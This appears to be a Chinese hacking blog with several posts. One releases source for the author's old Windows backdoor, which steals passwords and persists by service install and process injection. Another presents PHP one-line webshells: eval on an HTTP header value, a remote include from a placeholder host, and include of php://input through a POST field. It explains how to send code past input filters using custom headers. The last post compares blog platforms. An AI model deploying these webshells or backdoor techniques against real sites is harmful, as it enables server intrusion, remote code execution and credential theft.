浮幽小栈

一共弄了两种格式,四份文档,分别如下

安全焦点精华文档(CHM格式,21MB,包括首页的焦点原创,安全文摘,和论坛的精华文章)
http://bbs.nettf.net/ZV/xfocus_chm_arts.rar

安全焦点工具文档(CHM格式,900K,首页的安全工具文章,考虑到不是经常用,不放在精华档,单独收集)
http://bbs.nettf.net/ZV/xfocus_chm_tool.rar

安全焦点漏洞文档(CHM格式,6.5MB,首页的安全漏洞文章,考虑到不是经常用,而且大部分过时的信息,不放入精华档,单独收集)
http://bbs.nettf.net/ZV/xfocus_chm_bugs.rar

安全焦点完整文档(HTML格式,20MB,以上三个文档的所有文件都打包在这里,方便不同系统的用户使用)
http://bbs.nettf.net/ZV/xfocus_html_all.rar


脚本源代码见附件:

XCD.php

本想找个无害的shellcode来做教学用,后来在www.milw0rm.com找到一个messagebox的,不料却是一个不通用版本,还需要自己填写loadlibrary地址,getaddr地址,索性就干脆自己写了一个以后用.

点击下载源代码:

main.c

不知道是什么时候了,可能是03,04年的时候写的吧.代码量有1~2万行左右.功能也挺多的.程序是用lcc编写的.

整个软件是模仿WinEggDrop的那个后门写的.现在是没什么价值了,藏着掖着也过了几年,再不拿出来,可能就要烂在电脑里面了.

这个后门支持多个用户同时登陆,有权限设置,用户间可通讯,多线程.

功能有ftpserver,tftpserver,httpproxy,httpserver,getfile,getpass.端口映射等等.....

版本我更新过两次,第一个版本叫做conway.第二个版本叫做lecher.

两个版本的代码我都放上来.希望对初学者有点帮助好了.毕竟是我早年的作品,代码风格和技术都相对落后,高手就不要看了.

另外不希望大家把这里的代码重新包装后拿去卖,虽然这些代码很多不值钱了.

conway的代码:
conway.rar
我也忘记这个是用什么了,似乎还是有进程的,这个是比较早的,用服务启动.还有个是打包程序,基本上没什么用.

lecher的代码:
lecherdll.rar
我给出的是核心的dll代码,用嗅探的方式运行,用服务的方式自启动,用注射的方式执行,这些都是03,04很流行的技术呢.当然现在是没什么了.反而甚至失去了价值,大多数软件的行为检测都能发现.-_-.
还有一个是外壳程序,就是注射到进程内部,然后运行这个dll的.代码在下面:
lecherpack.rar

这篇文章大概是涉及到了web,注入,一句话木马,很多人觉得做脚本小子,黑别人网站有点低级和为之不齿.更多名门正派老字号的黑客都不削于这种技术....哈哈
其实我个人也这么认为,可是俺是年轻人,思想比较浮躁和喜欢新鲜,加之俺又活在这个新生事物频发的年代,多少也要接触这些好的差的..好在对此研究也仅限于了解的目标.并不到为之痴狂的地步...
哎呀,废话说的太多了,opera的blog没有摘要功能,所以没偏杂文还是尽量简短一点好....

什么是一句话木马我就不说了哈....
传统的一句话木马如果碰到这台机器刚刚好升级,或者因为发现被入侵,装了一套过滤系统,这台机器上的一句话木马基本上成了残废,因为这个时候入侵者的代码数据无法上传到一句话木马,无法运行,也就没了这个功能了.
不过我不知道大家为什么这么久都没发现有一个地方,其实一直存在着漏洞,如果用在一句话木马上,一句话木马的前途将会非常光明.任何的过滤系统都不能够阻挡你的执行数据的目的,就算他的get,post,cookie,xml,rss全部严格过滤也无济于事.甚至,这个方法将很难有有效的防治办法.下面介绍这个办法.其实很简单.

说起发现这个方法,起码有个两年的时间了,有的时候要想要发出来又因为当时没有时间而过后又忘记了.

先看第一段代码:

<?
//$_SERVER里面可以是以下几个:
//HTTP_ACCEPT
//HTTP_ACCEPT_CHARSET
//HTTP_ACCEPT_ENCODING
//HTTP_ACCEPT_LANGUAGE
//HTTP_CONNECTION
//HTTP_HOST
//HTTP_REFERER
//HTTP_USER_AGENT
?>

<?eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?>

放出这个,肯定很多人就明白了.就是利用http头的一些信息附带你的数据上去,作为一句话木马执行的参数.
不过明白的这些人肯定会有以下几个问题:
1.为什么说很难被防止.
因为http头信息有丰富的非法字符,比如代码中常用的*,逗号,句号,单引号,双银号,小括号等等等等其他的字符,如果把防注入程序用于http头,那恐怕几乎所有的正常数据都将被防止了.所以不可能对http进行过滤,需要非常复杂的的手法才能,相信没有人会去开发这种软件.
2.http头部够长吗,通常要执行的代码将会很长.
我测试过,iis和apache对于http头的数据确实有长度限制,这个限制大概是10,000-15,000个字符,也就是15KB,如此长的容量,我想传个简单的语句上去已经绰绰有余了吧,况且,当真碰到只有100多个字符限制的服务器,也可以先增量写入到session,然后从session中取出执行即可.
3.如何利用?

其实写个简单的代码是最好的了,本文附件中有带一个c源代码(gethttp.c)是简单的自定义http头信息,你可以用它来上传你的数据.

其次还可以借助一个工具:accessdiver.
该工具的下载地址:
http://www.accessdiver.com/downloads.htm

运行之后按f4按键,点击到extras tool页面,点击该页面下的http debugger子页面,在该页面的http address输入你的一句话木马页面,选择mode的get,点击mode上面一点的header data,会出现一个输入框,这个就是给你自定义http头的地方,其他地方我就不用说了,大家看看就会明白,这个工具很好用哦.

好了,上面说的那些是第一只马,现在再来第二只马.
代码:

<?@include("http://xxx/xx.txt");?>

相信大多数人都用过这样的马,不过这样的马有缺点,要是 allow_url_fopen 选项的支持.
其实利用inlcude做马的好处非常明显,没有了eval这些关键字,通过扫描的方式一般找不出来.
于是就有了下面这种include马:

<?@include($_POST["zv1984"]);?>

很普通哦.....然后用accessdiver(前面有下载地址).httpdebugger中选择post模式,post数据为:
zv1984=php://input&<?phpinfo();?>
然后看看效果.很棒吧.&号后面可以是任意的php代码.

好像很多了,就这样吧,可能我说的还是很简单,简单最好了不是么.

附件:gethttp.c

其实Csdn的Blog我也蛮喜欢的,只是这Opera的blog我更喜欢了.
理由如下:

1. Opera的blog比Csdn的兼容性稍微好那么一点点.Asp写的程序我一向十分讨厌.
   
2. 稳定性也比Csdn要好一点,换blog的这几天,csdn又出毛病了.
   
3. Opera可以直接上传附件,方便的方便啊!!我不要找其他站放东西了.
   
4. Opera国际速度访问比较快(国内也还行)
   

不过Opera也有点不方便的地方,不知道是不是我刚刚用,没找到这些功能.
比如

1. 似乎不支持文章摘要功能,这点比较麻烦,通常我的文章都很长.只好写成文档,给别人下载了.
   
2. 还有Opera貌似不支持直接HTML编辑,有点不方便,不过还好不是很需要这种功能.
   
3. 貌似有的时候处理js的速度很慢,会假死,csdn的脚本要快很多.
   

其实最重要的就是它在国外,而且可以存放东西,足够让我从csdn转到这里来了.
在这之前一直在"导航"部分添加越来越多的CSDN自己的link这都忍了..
更加让人愤怒的是,CSDN居然最近在每一篇blog的结尾处加上了牛皮癣(广告),这是非常让人不可接受的!!
让人担心的是千万不要给GCD封了.